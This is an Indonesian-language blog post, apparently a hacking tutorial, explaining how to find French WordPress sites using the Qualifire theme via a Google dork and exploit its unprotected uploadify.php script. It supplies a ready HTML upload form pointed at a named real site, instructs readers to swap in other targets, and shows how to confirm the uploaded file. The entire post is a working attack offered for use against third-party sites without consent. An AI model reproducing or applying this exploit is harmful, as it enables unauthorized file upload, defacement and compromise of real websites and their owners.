pertama-tama kita cari terlebih dahulu targetnya gunain dork ini
inurl:/wp-content/themes/qualifire site:.fr
selanjutnya pilih salah satu ,,
kemudian exploit urlnya dengan ini
/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.phptempatkan tepat dibelakang site.com/ nya
kalo vuln ,, dia akan blank seperti gambar diatas.
sekarang gunakan script berikut untuk upload file kedalam situsnya.
<form
action="http://www.lightsonorisation.fr/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php"method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="Submit">
<!-- by anbuKakashi -->
</form>
yang berwana merah ganti dengan site yang kalian temukan. simpan dengan ekstensi .html
kemudian buka file yang sudah dibuat tadi.
jika berhasil maka akan seperti pada tampilan berikut, ada angka 1
sekarang uji coba.. cara memanggilnya dengan site.fr/file
contoh : http://www.lightsonorisation.fr/2016.png
HAPPY NEW YEARS 2016 ( ^_^ )!!!!
0 comments:
Post a Comment